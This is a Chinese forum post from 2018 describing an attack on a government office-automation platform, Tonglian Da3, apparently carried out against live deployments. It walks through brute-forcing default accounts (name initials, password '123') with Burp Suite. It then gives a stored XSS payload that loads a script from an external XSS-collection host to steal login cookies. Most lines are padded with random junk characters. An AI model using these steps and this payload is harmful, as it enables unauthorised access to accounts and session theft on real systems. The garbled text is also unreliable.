: C, B+ f! J: C9 D6 |
9 t" D0 R3 l# _$ F 同联Da3协同办公平台后台通用储存型xss漏洞
: D6 W) E& B& _! r
0 ]; @, O, B; N" N$ `0 H- O& d" F : p& {2 w9 x+ q4 u; M+ D
平台简介:
9 s) A( D/ i' s# O
5 f* F; l2 ?, H. N6 J5 J V0 F' s, s
0 |$ @7 C% p& v& `2 `$ J2 F6 L) N
3 G: f9 ~& ?5 `
: W7 b" x# |8 U0 r3 K$ a
6 g& @' e; `: Z$ \ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; [. ], m7 l; t
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 G' ?( H3 F: `同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
) r% e/ F, x; g4 @& G; Q/ H$ L# B
9 N* y. }, Q( J
3 m2 X4 L3 L7 y" G6 B2 C
{% e6 V5 q4 A
9 w/ A6 l2 z: |( Z1 h" N0 F7 s7 c + \" ?. {1 D f- w8 G: s7 g
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
% B& {" E( i: T0 ]4 ^0 A' C( y* x
2 O. \' q( e. V; N. I0 M' E; m
) D" L$ Z; C# ?! R* [& u/ `! p 0 b5 B% S* S# ^* ?6 q- D( K+ N- i
" Q" c+ E1 d- d" e1 j/ w9 ^1 A
/ B& r: C; I, v4 C
http://1.1.1.1:7197/cap-aco/#(案例2-)! j# N* l$ {& \+ [
, U, b: j) ~ |7 R9 j5 j
! b' @7 a& l" B% m http://www.XXOO.com (案例1-官网网站)* s# }' \0 f( u2 ^/ U& y
% n7 L2 Q2 z, I T & B9 }. s; j0 c/ _; _5 H9 t
漏洞详情:
# W" Q# L/ O( N
8 S( L- ~0 S4 V% t
- ]* C# P2 Y. Y- P 案例一、% `& `& K+ }, q- Q* \. o
& I- J7 V3 u0 q; P/ e0 x
* Q; d+ W2 ^& Y, H! H: i* o
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
. L/ a* k% G s5 j0 o, `6 q
1 @# n- s% {( g ) V0 O" [) M) C3 H& G) p9 g, ]
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:6 s- v: m6 P/ f% E `5 O9 q
1 H0 O" B3 F G# \( z, n+ X
( C3 E) O/ m- q) }: ^ 0 t1 U; O5 m( `8 `" X9 v
5 H8 O. k. W/ ? 0 d! Z9 ^# s) G c f+ f1 B f
, g: L+ [, g# d; a2 T( ?
7 n4 k3 a! Z: u! V( @. K2 j) W
" S# i% @' Z3 ?+ d8 i# ?9 e
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: , P* t1 u' G, P; R
2 _7 b, J4 S+ b( x/ U# |6 H5 h
A5 u p8 G, u
) `( Y% r& y& Z8 C4 w( r
& f% Q. b2 G9 J! K) Z3 S ( t7 g) A4 A+ S4 N
& \, |( Q+ X6 P. F2 M. x1 ]
) ~' D( {8 z, I! M
, A& _6 M8 s0 y c2 f$ x& D. H 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
7 r& T0 C! ?- {8 A5 M# g) n% y
5 Q8 K. q& K6 D& a) [* }2 M
: |' Y1 m# i& k. Y9 v1 v : s/ h# F8 L- ~5 p: f
6 Q$ K3 S$ O6 f! e! F
j3 h. S: S7 E0 R+ J1 n1 i9 @ <img src=x
% u7 B4 {; i" M4 C9 Zonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 9 k# d& ~. S4 Z, L; p: w
! a3 s% n: ]+ P4 y
/ k- B5 _; {+ z0 h! O
# H' [+ X6 \+ _' _) B$ h4 l2 ^
/ }) }$ x3 l% A0 {) }0 t
( p% T% ]( h8 \2 [
然后发送,接收cookie如图:
G3 p2 r& h! d. t+ h* u
7 }9 S' q) r6 {7 Q
2 A2 Y3 N5 d6 {; D
3 p% H9 {) J3 m3 c
$ c) r- n% K1 y5 N1 @- C% a 6 [7 C$ i) o( y7 R" @
; O! ~+ i4 Q5 M2 C/ E6 z3 [
" H% V% j/ u+ C- M6 p7 b& \
- O: S2 N: _& Z1 h/ g! q1 U4 | : G$ z9 i2 M3 G' a
0 P* F- v( @0 B
2 i! a7 N+ J! _; g' y4 z: u
# f' Z* e* p# }# F
/ u, X f$ l7 o0 Y) ~& c! E 6 \1 K7 P H) ^( y4 I/ c1 w
& O4 l2 b$ t( O' ~4 \% E9 C r+ P
, M9 j5 j7 t* y" ?2 Q6 e3 h, a , E1 E1 h! O/ Z5 y3 Q
2 z8 g) {# D! `. i1 O! G
* g3 q2 v J; _0 A) P
" |! F+ n( W$ B0 y# s+ R' K
: W9 O: S4 T* X9 U
2 E f$ t$ I4 v' ~ % b% P0 S( \3 M/ d* d& F
案例2、
1 L, y* w' ]( S H
1 F7 f7 I1 j/ d* k' R Z
. o: w# ~. c# x$ n! u" ? 前面步骤都一样,下面看效果图: . D. k0 H. u+ @0 n2 e
: D2 H- {% I+ |& r7 V
% K* S1 C4 K9 s& Y 
) p j% V5 |, b0 I; q
! L2 T: a {+ }5 B* A6 N
; A# I3 _- @: O: Y" L# _+ |
: B! @2 K+ G& L
0 `" z, x1 P6 C* \) j
4 M' s; u# C: {2 Z% p% h 7 x9 }4 n# E; n7 t; Q; S
+ g9 K t- C7 E9 e$ p7 ^
) Y3 O1 M6 \& V$ @; | ; F# k1 N# Q' w% v' p
1 |/ a' p0 q- I; t; L/ I I
2 l' {' u1 f7 n+ l% E8 X 
7 N0 b9 V F' e: r# A
1 m" L5 M( E( }, p2 u
# P7 U% D3 G' [) f, N7 @/ h# ? ; ?/ ^0 [( {; [+ c) V. x2 t
3 q0 `) M+ ?# j( ?( |1 g' Z
& t' c% b0 @; H" b
1 V( m* v2 ]! | |/ P; M6 W
! T% J/ q5 ~& \1 A 5 W% _# H" V; J' m. ] E! l
* I4 ~0 x b& @) {! ]
3 H' [" {( H- h, g. h9 Q
6 F8 o; {# Q4 {6 Y8 d% G
! o; v; N2 Y, w1 i" o/ S) b7 `2 Z2 N
5 K7 d, A% U9 O; a& q 
发表于 2018-10-20 20:14:15
收藏
支持
反对